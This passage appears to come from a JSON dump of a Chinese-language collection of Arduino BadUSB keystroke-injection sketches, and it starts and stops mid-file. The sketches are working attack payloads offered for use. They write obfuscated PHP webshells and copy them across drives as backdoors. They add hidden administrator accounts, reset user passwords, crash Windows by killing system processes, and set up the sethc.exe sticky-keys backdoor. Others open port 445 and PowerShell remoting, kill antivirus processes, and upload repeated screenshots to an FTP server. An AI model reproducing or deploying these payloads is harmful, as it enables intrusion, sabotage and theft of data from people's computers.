'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入jsp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php >> hacked.php\");  //向hacked.php写内容,类绕过，密码wwy\n  delay(200);\n  Keyboard.println(\"echo class shawaf >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo { >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo   public $a = ''; >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo   function __destruct(){ >> hacked.php\");\n  delay(200);\n  Keyboard.println('echo     assert(\"$this->a\"); >> hacked.php');\n  delay(200);\n  Keyboard.println(\"echo   } >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo } >> hacked.php\");  \n  delay(200);\n  Keyboard.println(\"echo $b = new shawaf; >> hacked.php\");  \n  delay(200);\n  Keyboard.println('echo $b->a = $_POST[\"wwy\"]; >> hacked.php');  \n  delay(200);\n  Keyboard.println(\"echo ?^> >> hacked.php\");  \n  delay(200);\n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php  >> hacked.php\");  //向hacked.php写内容,密码_\n  delay(200); \n  Keyboard.println(\"echo $_=(''^'`').(''^'`').(''^'`');  >> hacked.php\");  //ass\n  delay(200); \n  Keyboard.println(\"echo $__=(''^'`').(''^'`').(''^'`');  >> hacked.php\");  //ert\n  delay(200); \n  Keyboard.println(\"echo $_ = $_.$__;  >> hacked.php\");  //assert\n  delay(200); \n  Keyboard.println(\"echo $__='_'.('\\''^'`').('%'^'`').('4'^'`');  >> hacked.php\");  //_GET\n  delay(200); \n  Keyboard.println(\"echo //$__='_'.('  >> hacked.php\");\n  delay(200); \n  Keyboard.println(\"echo //'^']').('/'^'`').(''^']').('\t'^']');  >> hacked.php\"); //_POST\n  delay(200); \n  Keyboard.println(\"echo $___=$$__;  >> hacked.php\");\n  delay(200); \n  Keyboard.println(\"echo @$_($___[_]);  >> hacked.php\");  //@assert($_GET[_])\n  delay(200); \n  Keyboard.println(\"echo ?^>  >> hacked.php\");\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php @eval($_POST['wwy']); ?^>  >> hacked.php\");  //向hacked.php写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "SpecificFunctionCode/AddUserCode(Tools).ino",
    "content": "#include <Keyboard.h>\n\nvoid setup() {\n  // 这里执行一次\n  Keyboard.begin();//开始键盘通讯 \n  delay(2000);//初始化时间\n  Keyboard.press(KEY_LEFT_GUI); //点击win键\n  delay(50); //延迟执行时间\n  Keyboard.press('r'); //点击r键\n  delay(50);\n  Keyboard.release(KEY_LEFT_GUI); //释放win键\n  Keyboard.release('r'); //释放r键\n  delay(50);\n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //打开cmd并将串口最小化\n  delay(100);\n  Keyboard.press(KEY_RETURN); //回车\n  Keyboard.release(KEY_RETURN); //释放回车\n  delay(50);\n  Keyboard.println(\"net user test 123456 /add&net localgroup Administrators test /add\"); //添加test用户\n  delay(1000);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);\n  delay(1000);\n  Keyboard.println(\"exit\");\n  delay(50);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);\n  Keyboard.end();//结束键盘通讯 \n}\n \nvoid loop() {\n  // 这里循环执行\n \n}"
  },
  {
    "path": "SpecificFunctionCode/Alt-f4_Loop.ino",
    "content": "void setup() {//初始化\nKeyboard.begin();\n}\nvoid loop()//循环\n{\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.press(KEY_F4);\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino",
    "content": "#include<Keyboard.h>\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200);\n  Keyboard.println(\"CMD.EXE /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&NET USER %USERNAME% HACKED\");//修改密码HACKED\n  delay(200); \n  Keyboard.println(\"color a\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ........................................................   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"echo ##     ##    ###     ######  ##    ## ######## ########  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 0\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ##   ## ##   ##    ## ##   ##  ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 1\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ##  ##   ##  ##       ##  ##   ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 2\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ######### ##     ## ##       #####    ######   ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 3\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ######### ##       ##  ##   ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 4\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ##     ## ##    ## ##   ##  ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 
5\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ##     ##  ######  ##    ## ######## ########   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 6\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ........................................................   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color c\");//更改命令行颜色（红色）\n  delay(200); \n  Keyboard.println(\"cls\");//更改命令行颜色（红色）\n  delay(200); \n  Keyboard.println(\"type hacked.txt\");//将hacked.txt文件内容打印在cmd\n  delay(200); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");//蓝屏XP、7\n  delay(200); \n  Keyboard.println(\"taskkill /f /im explorer.exe\");//删除桌面进程(all)\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino",
    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n# define PAYLOAD_USER_ADD \"net user INPUT0 INPUT1 /add\"\n# define PAYLOAD_GROUP_ADD \"net localgroup Administrators INPUT0 /add\"\n\nvoid setup(){\n delay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd_admin(3,500))\n  {\n  reset_windows_desktop(2000);\n  }\nadd_user();\nKeyboard.println(\"powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \\\"WINRM-HTTP-In-TCP-PUBLIC\\\" –RemoteAddress Any\");\ndelay(2000);\nKeyboard.println(\"exit\");\n}\n\nvoid loop(){\n}\n\nvoid add_user(){\ndelay(2000);\nKeyboard.println(PAYLOAD_USER_ADD);\ndelay(2000);\nKeyboard.println(PAYLOAD_GROUP_ADD);\ndelay(1000);\n\n}\n\nDEFS"
  },
  {
    "path": "SpecificFunctionCode/ForceShutDownCommand(Tool).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"SHUTDOWN -S -F -T 0\"); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino",
    "content": "void setup() {\nMouse.begin();//鼠标事件开始\nKeyboard.begin();\ndelay(7000);\n for(int i=0;i<20;i++){\n   Mouse.move(-127,-127);//鼠标移动(x,y)\n }\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"\\\"C:\\\\Program Files (x86)\\\\360\\\\360Safe\\\\safemon\\\\360Tray.exe\\\" /disablesp 1\");\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(1000); \n  Keyboard.println(\"taskkill /F /IM explorer.exe\");\n  delay(3000);\n  for(int b=0;b<30;b++){\n    Mouse.move(20,0);\n    for(int a=0;a<100;a++){\n      Mouse.move(0,8);\n      Mouse.click();\n    }\n    for(int c=0;c<20;c++){\n    Mouse.move(0,-127);//鼠标移动(x,y)\n    }\n  }\nKeyboard.press(KEY_LEFT_CTRL);\nKeyboard.press(KEY_LEFT_ALT);\nKeyboard.press(KEY_DELETE);\nKeyboard.release(KEY_LEFT_CTRL);\nKeyboard.release(KEY_DELETE);\ndelay(2000);\nKeyboard.press('t');\nKeyboard.release('t');\ndelay(1000);\nKeyboard.press('f');\nKeyboard.press('n');\nKeyboard.release('f');\nKeyboard.release('n');\nKeyboard.release(KEY_LEFT_ALT);\ndelay(1000);\nKeyboard.print(\"explorer\");\nKeyboard.press(KEY_TAB);\nKeyboard.release(KEY_TAB);\ndelay(500);\nKeyboard.println(\" \");\ndelay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(1000); \n  Keyboard.println(\"cmd /c taskkill /F /IM taskmgr.exe&taskkill /F /IM 360Tray.exe&taskkill /F /IM ZhuDongFangYu.exe\");\nMouse.end();//鼠标事件结束\nKeyboard.end();\n}\nvoid loop() {\n  // put your main code here, to run repeatedly:\n\n}\n"
  },
  {
    "path": "SpecificFunctionCode/Hide_CMD_Window(Display).ino",
    "content": "//隐藏CMD窗口\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(1000); \n  //=========================Run==========================\n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6\");\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(' ');\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(' ');\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "SpecificFunctionCode/MouseKeepsMoving(Tools).ino",
    "content": "void setup() {\nMouse.begin();\n}\nvoid loop() {\nMouse.move(10,0);\ndelay(800);\nMouse.move(-10,0);\ndelay(800);\n}\n"
  },
  {
    "path": "SpecificFunctionCode/OpenPort445.ino",
    "content": "#include \"DigiKeyboard.h\"\n#define KEY_ESC     41\n#define KEY_BACKSPACE 42\n#define KEY_TAB     43\n#define KEY_PRT_SCR 70\n#define KEY_DELETE  76\n\nvoid setup() \n{\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(0);\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(KEY_M,MOD_GUI_LEFT);\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);\nDigiKeyboard.delay(500);\nDigiKeyboard.print(F(\"cmd\"));\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\nDigiKeyboard.delay(500);\nDigiKeyboard.print(F(\"netsh advfirewall firewall add rule name=\")); \nDigiKeyboard.print(char(34)); \nDigiKeyboard.print(F(\"open445\")); \nDigiKeyboard.print(char(34)); \nDigiKeyboard.print(F(\" dir=in protocol=tcp localport=445 action=allow\"));\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\n\n}\n\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "SpecificFunctionCode/OpenSpecified_webPage.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  Keyboard.println(\"HTTP://SHOP117137052.TAOBAO.COM\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ShiftBackdoor.ino",
    "content": "//Lemon_C Device Library\n//shop117137052.taobao.com\nvoid setup() {//初始化\n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6\");  //尽量隐藏命令行窗口\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.print(\" \");\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  delay(500);\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS CMD -VERB RUNAS&&EXIT\");  //psl启动dos命令\n  //NEED BYPASS UAC NOW,SET DELAY=3S.\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(3000);\n  Keyboard.print('Y');\n  Keyboard.releaseAll();\n  delay(2000);\n  //HIDE THE WINDOW\n  Keyboard.println();\n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6&EXIT\");  //尽量隐藏窗口\n  delay(800);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.print(\" \");\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  delay(500);\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&TAKEOWN /F %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE&ICACLS %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE /GRANT ADMINISTARTORS:f&ECHO Y|CACLS %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE /g %username%:f&COPY C:\\\\WINDOWS\\\\SYSTEM32\\\\CMD.EXE C:\\\\WINDOWS\\\\SYSTEM32\\\\SETHC.EXE /y&EXIT\");  //替换SETHC文件，设置shift后门\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  
Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/SimplyChangeAllUsersPasswords(TrickItem).ino",
    "content": "#include<Keyboard.h>\nvoid setup() \n{//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD.EXE /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&NET USER %USERNAME% HACKED&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "SpecificFunctionCode/SimplyShutDownMachine(TrickItem).ino",
    "content": "#include <Keyboard.h>\n\nvoid setup()\n {\n  // put your setup code here, to run once:\n  Keyboard.begin();//开始键盘通讯\n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(50);\n  Keyboard.press(KEY_LEFT_GUI);//win键\n  delay(500);\n  Keyboard.press('r');//r键\n  delay(500);\n  Keyboard.release(KEY_LEFT_GUI);//按住win+R\n  Keyboard.release('r');\n  Keyboard.print(\"cmd\");//输入cmd\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);//回车\n  delay(500);\n  Keyboard.print(\"shutdown -s -t 0\");//关机\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);//回车\n  Keyboard.end();\n}\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "SpecificFunctionCode/TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino",
    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n\nvoid setup(){\ndelay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd(3,500,\"cmd /T:01 /K \\\"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\\\"\"))\n  {\n  reset_windows_desktop(2000);\n  }\n\n Keyboard.println(\"echo Add-Type -Assembly System.Windows.Forms  > %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo mkdir $env:temp\\\\screens -Force  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo While (1) {  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $fn = $((get-date).toString('dd_MM_yyyy_HH_mm_ss')) + \\\".png\\\"  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sb = [Windows.Forms.SystemInformation]::VirtualScreen  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso = New-Object Drawing.Bitmap $sb.Width, $sb.Height  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg = [Drawing.Graphics]::FromImage($sso)  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg.CopyFromScreen( $sb.Location, [Drawing.Point]::Empty, $sb.Size)  >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $dg.Dispose() >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso.Save(\\\"$env:temp\\\\screens\\\\$fn\\\") >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo $sso.Dispose() >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo sleep INPUT0 >> %temp%\\\\ss.ps1\");\n  Keyboard.println(\"echo  } >> %temp%\\\\ss.ps1\");\n\n\n\n  Keyboard.println(\"echo while(1)  {  > %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  $wc = New-Object System.Net.webclient >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  foreach($it in (ls $env:temp\\\\screens)) { >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo  $wc.UploadFile(\\\"ftp://INPUT2:INPUT3@INPUT4/INPUT5\\\" + $it.Name, $it.FullName) } >> %temp%\\\\up.ps1\");\n  Keyboard.println(\"echo rm (\\\"$env:temp\\\\screens\\\" + \\\"\\\\*\\\") -Force  >> %temp%\\\\up.ps1\");\n  
